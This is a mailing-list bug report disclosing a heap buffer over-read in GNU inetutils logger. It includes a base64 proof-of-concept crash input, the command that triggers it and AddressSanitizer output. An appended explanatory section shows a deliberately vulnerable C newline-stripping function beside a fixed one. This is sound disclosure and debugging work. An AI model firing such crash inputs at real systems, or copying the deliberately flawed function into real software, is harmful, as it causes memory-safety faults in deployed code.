bug-inetutils

Heap-based Buffer Overflow in logger


From: AiDai
Subject: Heap-based Buffer Overflow in logger
Date: Fri, 24 Dec 2021 14:13:13 +0800

# Heap-based Buffer Overflow in logger

## Description

Heap-based Buffer Overflow in logger at inetutils/src/logger.c:329

**version**

```
./logger --version
logger (GNU inetutils) 2.2.16-cf091
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by Sergey Poznyakoff.
```

**System information**
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**PoC**

```
base64 poc
ZYdn/3JycmMjY2NPcnJjI2NjTwCAAAoAAIAAAABECm5vjAB9UQpubm9ybREqGzZNaYSEKhs2TWmE
hHY=
```

**command**

```
./logger -s < ./poc
```

**Result**

```
 ./logger -s < ./poc
e�g�rrrc#ccOrrc#ccO
=================================================================
==4156==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000003f at pc 0x0000004c679b bp 0x7ffe5f3b7250 sp 0x7ffe5f3b7248
READ of size 1 at 0x60c00000003f thread T0
    #0 0x4c679a in send_to_syslog /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:329:11
    #1 0x4c5cf2 in main /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:511:2
    #2 0x7fa5804200b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #3 0x41c46d in _start (/root/disk2/fuzzing/inetutils/fuzz/bin/logger+0x41c46d)

0x60c00000003f is located 1 bytes to the left of 120-byte region [0x60c000000040,0x60c0000000b8)
allocated by thread T0 here:
    #0 0x494bad in malloc (/root/disk2/fuzzing/inetutils/fuzz/bin/logger+0x494bad)
    #1 0x7fa58047f6c3 in getdelim /build/glibc-eX1tMB/glibc-2.31/libio/iogetdelim.c:62:27
    #2 0x8000000000000005  (<unknown module>)

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:329:11 in send_to_syslog
Shadow bytes around the buggy address:
  0x0c187fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c187fff8000: fa fa fa fa fa fa fa[fa]00 00 00 00 00 00 00 00
  0x0c187fff8010: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
  0x0c187fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==4156==ABORTING
```
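
Added worked example (not part of AiDai's report and not inetutils' own source; the code at logger.c:329 is not reproduced on this page, so the function names below are hypothetical). Decoding the base64 PoC gives a first line of `e\x87g\xffrrrc#ccOrrc#ccO\x00\x80\x00\n` (which is what `logger -s` echoed before the abort, truncated at the embedded NUL) followed by a second line `\x00\x80\x00\x00D\n` that begins with a NUL byte. A read of 1 byte to the left of a `getdelim`-allocated region is what `msg[strlen(msg) - 1]` produces when `strlen` returns 0 for such a line, so the example shows that newline-stripping pattern beside a version that keeps the byte count `getline()` returned, and feeds the constructed PoC bytes through `getline()` to find the offending line.

```c
#define _GNU_SOURCE          /* getline(), fmemopen() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

/* Constructed stand-in for the first two lines of the PoC above (decoded from
 * the base64 in the report).  The second line begins with a NUL byte.  The
 * literal is split so that "D" is not swallowed into the preceding hex escape. */
static const char poc_head[] =
    "e\x87g\xff" "rrrc#ccOrrc#ccO" "\x00\x80\x00\n"
    "\x00\x80\x00\x00" "D\n";
static const size_t poc_head_len = sizeof poc_head - 1;

/* Vulnerable pattern (hypothetical; not inetutils' code).  The length that
 * getline() returned is discarded and recomputed with strlen(), which stops at
 * the first NUL.  For a line whose first byte is NUL, len is 0 and msg[len - 1]
 * reads msg[-1]: one byte to the left of the heap region, which is what the
 * ASan report shows.  Do not call this on a NUL-led line. */
static size_t strip_newline_vuln(char *msg)
{
    size_t len = strlen(msg);
    if (msg[len - 1] == '\n')        /* out-of-bounds read when len == 0 */
        msg[--len] = '\0';
    return len;
}

/* Fixed form: keep the byte count getline() reported and guard len == 0.
 * Embedded NULs are then just ordinary bytes of the message. */
static ssize_t strip_newline_fixed(char *msg, ssize_t len)
{
    if (len > 0 && msg[len - 1] == '\n')
        msg[--len] = '\0';
    return len;
}

/* Read an in-memory byte stream with getline(), as a line-oriented logger
 * reads stdin, and count the lines on which the vulnerable stripper would
 * index msg[-1] (lines whose first byte is NUL).  Returns -1 on failure. */
static int count_nul_led_lines(const char *data, size_t n)
{
    FILE *fp = fmemopen((void *)data, n, "r");
    char *buf = NULL;
    size_t cap = 0;
    ssize_t len;
    int bad = 0;

    if (fp == NULL)
        return -1;
    while ((len = getline(&buf, &cap, fp)) > 0) {
        if (buf[0] == '\0')          /* strlen(buf) == 0: vuln would read buf[-1] */
            bad++;
        strip_newline_fixed(buf, len);   /* safe on every line, NUL-led or not */
    }
    free(buf);
    fclose(fp);
    return bad;
}

int main(void)
{
    char ok[] = "hello\n";
    printf("vulnerable stripper on \"hello\\n\": new length %zu\n",
           strip_newline_vuln(ok));
    printf("NUL-led lines in the PoC head: %d\n",
           count_nul_led_lines(poc_head, poc_head_len));
    return 0;
}
```

Build with `-fsanitize=address` and call `strip_newline_vuln` on a buffer whose first byte is NUL to see the same "1 bytes to the left of" report; the fixed form needs the `getline()` return value, which is the only reliable length once a line can contain NUL bytes.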

